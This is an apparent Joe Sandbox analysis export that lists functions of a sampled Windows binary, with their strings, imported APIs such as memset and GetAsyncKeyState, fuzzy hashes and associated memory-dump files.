Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: powf
String ID: @
API String ID: 3445610689-2766056989
Opcode ID: bdf8a5108188d0912c928daf5514e6aec9c5b901fca40889fc2c87942bdcc7bc
Instruction ID: e7ca9f149ccf0ef06b69bd145f7c83cf64256724a985d934f79d061c580242c6
Opcode Fuzzy Hash: bdf8a5108188d0912c928daf5514e6aec9c5b901fca40889fc2c87942bdcc7bc
Instruction Fuzzy Hash: 6712FC23D0CBCD87E652A63791412B6E350AF6F7C4F5C8732EE4C366E2DF29A1858614

Function 00007FF75801DDD0 Relevance: 3.1, Strings: 2, Instructions: 571COMMON

Download Yara Rule

Strings

X?, xrefs: 00007FF75801E376
#RESIZE, xrefs: 00007FF75801DF67

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID: #RESIZE$X?
API String ID: 0-1702540906
Opcode ID: 3d8a80719b9331a2956df997aecb6dfce3fd79b64341bdc0a91589c2a15663a0
Instruction ID: e5a47f54037e15369f01eb0406dd08ef0c4159a99f888c31331aafb5b8bad76f
Opcode Fuzzy Hash: 3d8a80719b9331a2956df997aecb6dfce3fd79b64341bdc0a91589c2a15663a0
Instruction Fuzzy Hash: D252D633D08B898BE352DB3794411BDF760EF5A354F5D8721EE8C265E1EB28B4888B54

Function 00007FF758039BC0 Relevance: 3.0, Strings: 2, Instructions: 474COMMON

Download Yara Rule

Strings

##ComboPopup, xrefs: 00007FF758039D8B
##Combo_%02d, xrefs: 00007FF75803A23D

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID: ##ComboPopup$##Combo_%02d
API String ID: 0-4115995950
Opcode ID: 6070e807bdff3e9d3c4a81e8b6c647e75420b244936fd54365f5a6d6fd2c82e6
Instruction ID: 2472a22c4e3ca26d8b8506e7dabfa0fb8b8d7ae24d8e460b23315c1ae4f7c513
Opcode Fuzzy Hash: 6070e807bdff3e9d3c4a81e8b6c647e75420b244936fd54365f5a6d6fd2c82e6
Instruction Fuzzy Hash: 3C32C132E08A858BE711EB66E4402ADF770EF89344F985235EE4C276E5DF38E448CB54

Function 00007FF758018EF0 Relevance: 2.8, Strings: 2, Instructions: 322COMMON

Download Yara Rule

Strings

#COLLAPSE, xrefs: 00007FF7580190A0
#CLOSE, xrefs: 00007FF75801913D

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID: #CLOSE$#COLLAPSE
API String ID: 0-3250029216
Opcode ID: 9d95bc19197b0ab61f19a15649370599392cb8a49d289c0943e1b4ed6441d12f
Instruction ID: 6a56a2c236609cda8d09154c4aa5d0bda8737e153c2d88a022de474d42a7a6ec
Opcode Fuzzy Hash: 9d95bc19197b0ab61f19a15649370599392cb8a49d289c0943e1b4ed6441d12f
Instruction Fuzzy Hash: 9CE11832E04B898AE712DB3294411B9F360AF6D394F899732DE5C372D1EB3960998754

Function 00007FF75802D530 Relevance: 2.8, APIs: 2, Instructions: 265COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF75802D696
memset.VCRUNTIME140 ref: 00007FF75802D6AF

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 4e77a4257d10bb4d628b5f0dd0f7ea76fa89fbc0de37aee19a9862cc0838d949
Instruction ID: 606a8c330af4fe550f9c565f41f224f4f68ab7f47e9d506e86fb5c58a80c0fec
Opcode Fuzzy Hash: 4e77a4257d10bb4d628b5f0dd0f7ea76fa89fbc0de37aee19a9862cc0838d949
Instruction Fuzzy Hash: DFC1D832A08AC986E7619F26D0452B9F360FF58784F588331DF8D136A0EF39E556CB14

Function 00007FF758022920 Relevance: 2.5, Strings: 1, Instructions: 1207COMMON

Download Yara Rule

Strings

(, xrefs: 00007FF758023C33

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memmove
String ID: (
API String ID: 2162964266-3887548279
Opcode ID: b98ecd9055e2bdeb0bdde2e4a80341c4f88354f3b7837c41e9c3d381e59f9c6c
Instruction ID: 917284afbc3fcea806dd87b868114abe738eec8285fb9edcfc72e39c6ea08219
Opcode Fuzzy Hash: b98ecd9055e2bdeb0bdde2e4a80341c4f88354f3b7837c41e9c3d381e59f9c6c
Instruction Fuzzy Hash: 10C28D33A25B8886D702DF3BC481169B7A0FFA9B84B59D712EE09237B5DB35E454DB00

Function 00007FF7580382B0 Relevance: 1.9, APIs: 1, Instructions: 446COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF758038470

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: e6f28d1fffea5cf1ec40eb1a14450ed62193a535dc06621ed51807f10df407cb
Instruction ID: efde098eb38dfb164885354e6584c448f2b89d72180d970f6e6463788736f047
Opcode Fuzzy Hash: e6f28d1fffea5cf1ec40eb1a14450ed62193a535dc06621ed51807f10df407cb
Instruction Fuzzy Hash: 3E22DA22D1CBCD86E263A63794422B6F350AFAE385F5C9732ED4C365F2DF2970858614

Function 00007FF758037A20 Relevance: 1.9, APIs: 1, Instructions: 443COMMON

Download Yara Rule

APIs

powf.API-MS-WIN-CRT-MATH-L1-1-0 ref: 00007FF758037BD5

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: powf
String ID:
API String ID: 3445610689-0
Opcode ID: 43c82e8f00812fbef8fe2ab406deb5957907c42c3f3f86e4085d1b4caf34b3fc
Instruction ID: 35b0674000d7b6aef0a5a3164dabe8541c166cf3f54cfe89611187c4ab8b8f8b
Opcode Fuzzy Hash: 43c82e8f00812fbef8fe2ab406deb5957907c42c3f3f86e4085d1b4caf34b3fc
Instruction Fuzzy Hash: ED22D722D0CBCD86E262A63794422B6F350AFAE385F5C9B32ED4C355F2DF2974848614

Function 00007FF758011EB0 Relevance: 1.8, Strings: 1, Instructions: 550COMMON

Download Yara Rule

Strings

[nav] NavInitRequest: ApplyResult: NavID 0x%08X in Layer %d Window "%s", xrefs: 00007FF7580120C8

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID: [nav] NavInitRequest: ApplyResult: NavID 0x%08X in Layer %d Window "%s"
API String ID: 0-1553127323
Opcode ID: 146c37eb38bd7daf7c3e569147e5a8b8496f4c39fc2b25188b7eda05d1a4f20e
Instruction ID: 012e0e4c2bc0312aef9a5dd6a72b89b0e169c38dacc325fb8aa04035a6ef78dd
Opcode Fuzzy Hash: 146c37eb38bd7daf7c3e569147e5a8b8496f4c39fc2b25188b7eda05d1a4f20e
Instruction Fuzzy Hash: 9052C462D092C28BE765EF2594403BDE7E0EF45B18F9C8235CB5C172E1EF3864998768

Function 00007FF758013A60 Relevance: 1.8, Strings: 1, Instructions: 500COMMON

Download Yara Rule

Strings

##NavUpdateWindowing, xrefs: 00007FF758013B37

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID: ##NavUpdateWindowing
API String ID: 0-2766148257
Opcode ID: f59c7767b157c320af537099827ec75070265afb07cd9fa3641c59450d9b0ab5
Instruction ID: eead9bee09b0e9716eca1674e146a9bad0fbde635673762b9a1de24e03dfc0f3
Opcode Fuzzy Hash: f59c7767b157c320af537099827ec75070265afb07cd9fa3641c59450d9b0ab5
Instruction Fuzzy Hash: AB320662F08A8197E669A73289403B9E791FF45714F8D8635CB5C132E0EF3CB4A8875C

Function 00007FF7580182E0 Relevance: 1.7, Strings: 1, Instructions: 431COMMON

Download Yara Rule

Strings

0, xrefs: 00007FF758018858

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 78dc9aa0f3897004a8a2edb9babe8f6d68f21748d2e69a039d214ea7a20be8c7
Instruction ID: a6e133a28322ed65c27ef2bdb792c2bd29710cc17b90f1f724874cbcf44572c3
Opcode Fuzzy Hash: 78dc9aa0f3897004a8a2edb9babe8f6d68f21748d2e69a039d214ea7a20be8c7
Instruction Fuzzy Hash: 3222C232A18B8987E312DB3694412B9F360FF9D344F5C9721EB4C365A1EB38F1989B44

Function 00007FF758046B70 Relevance: 1.5, APIs: 1, Instructions: 17keyboardCOMMON

Download Yara Rule

APIs

GetAsyncKeyState.USER32 ref: 00007FF758046B84

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: AsyncState
String ID:
API String ID: 425341421-0
Opcode ID: f58ff4b5e6d8904447f2b6e2f57699f79cbdacebde3bb0e2824e362e6413eeeb
Instruction ID: 5c369bc72694c4b4d9765a85982013f4a04b75d5c7d5ac3aa8e73a531309420c
Opcode Fuzzy Hash: f58ff4b5e6d8904447f2b6e2f57699f79cbdacebde3bb0e2824e362e6413eeeb
Instruction Fuzzy Hash: 92E08CE5E0B20287F3447F61A884335E110AF44304EDC2038C02D421E1DE3CA08C8BF8

Function 00007FF7580431B0 Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

..., xrefs: 00007FF7580431B4

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID: ...
API String ID: 0-440645147
Opcode ID: 3cea2be103ee047b3a17c62156cc7cfda5caa3c1a232b769030a865f4505c0fb
Instruction ID: 8d1844c993ec2829dd12ad8f27c87066b90fdd163d0b76af357a7bf1b4c8a46e
Opcode Fuzzy Hash: 3cea2be103ee047b3a17c62156cc7cfda5caa3c1a232b769030a865f4505c0fb
Instruction Fuzzy Hash: 9EC1E722F08B848AF711DB7685417FEF361AF69798F499321DE0C37AE5DF28604A9710

Function 00007FF75802EEE0 Relevance: 1.4, APIs: 1, Instructions: 197COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF75802EF3A

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: fa185deeb2ee72e3e32c430131e599566fcfdf6b64bffdad8f46fa16dc87dd2f
Instruction ID: 75067e15997ef85abbda52063e245d118ec1d6ef8c6607c7f8b055922351627a
Opcode Fuzzy Hash: fa185deeb2ee72e3e32c430131e599566fcfdf6b64bffdad8f46fa16dc87dd2f
Instruction Fuzzy Hash: 7B6138A361C2E203D3665B3CA45127DEED0B749384F9C9335EA8FC2B85CE7DD5098654

Function 00007FF75802CD50 Relevance: 1.4, APIs: 1, Instructions: 195COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140 ref: 00007FF75802CDBA

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: f9180373e7b22e2cd4eaade5434fe17eb06fd105fc40c949542371e92c8cd6fc
Instruction ID: 21dc3144d862537554ac3b170a39c48048aaa8319b2075779d7b002f11d6836d
Opcode Fuzzy Hash: f9180373e7b22e2cd4eaade5434fe17eb06fd105fc40c949542371e92c8cd6fc
Instruction Fuzzy Hash: 19612773B1C2E187D7618B38E405A79EE94E75A308F8D8276DA8DC3A85DA2FD005C714

Function 00007FF758041E00 Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

--------------------------------, xrefs: 00007FF758042096

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID: --------------------------------
API String ID: 0-1918180962
Opcode ID: 5fb7c76d49979f05b635a6ed23fb451e16a93b380f1379ee12071584a31de5c7
Instruction ID: 19f2ab00b0c31ec0dd22b365a3016258faafae402e13276af019e6b386993b9d
Opcode Fuzzy Hash: 5fb7c76d49979f05b635a6ed23fb451e16a93b380f1379ee12071584a31de5c7
Instruction Fuzzy Hash: 8E81C422A08A8587E365EB26D4413AAF3A0FF99740F8C5331EB8D135F5DF28E059CB14

Function 00007FF758021740 Relevance: .9, Instructions: 867COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d79c1ee00465c966689e42b1aef18c6f769b6500a690218e0ace59bb8c2df62
Instruction ID: 1f49f16a055b64330eed08aa3ef89f9cf739a6ae459e36fcf3a6b51a33b2db1d
Opcode Fuzzy Hash: 3d79c1ee00465c966689e42b1aef18c6f769b6500a690218e0ace59bb8c2df62
Instruction Fuzzy Hash: AF925B33924B8886C712DF3BD48116DB760FFADB84B19D716EA09237A5EB35E494DB00

Function 00007FF75805E740 Relevance: .6, Instructions: 595COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2464a87b32c667e3a0343c0e335acc7e6fcd31b31d3a707c4116ee51963991c1
Instruction ID: 6d27e32f26e06a6847a0a438fe8413ac19a70fad74372940608a16ec0070abc5
Opcode Fuzzy Hash: 2464a87b32c667e3a0343c0e335acc7e6fcd31b31d3a707c4116ee51963991c1
Instruction Fuzzy Hash: 5D420761D5DB864BE26327399811375E758BFA6394F99D333ED5C308A0EF2CE18B4218

Function 00007FF75802FD40 Relevance: .5, Instructions: 456COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c8c8f850977c344d67bcefb2ae0c62a1fb88cd1721e80dadd293a1bc163580e
Instruction ID: 335454404b9fa23037a097c065b0440c4fa87258d70dad5e7d22382631589377
Opcode Fuzzy Hash: 9c8c8f850977c344d67bcefb2ae0c62a1fb88cd1721e80dadd293a1bc163580e
Instruction Fuzzy Hash: 6422F732A187C48BD321DB35E1417AAF7A0FB5D784F188326EB8D93655EB38E590CB10

Function 00007FF75801C640 Relevance: .4, Instructions: 411COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c04bdda2ce079871fc5bee89f6a619f3da58a3ca2f5fe1ae367337d111af29fc
Instruction ID: d1988e010e128e76dce4721e62334fc5055f82d05301d254e383e1afa2754b9b
Opcode Fuzzy Hash: c04bdda2ce079871fc5bee89f6a619f3da58a3ca2f5fe1ae367337d111af29fc
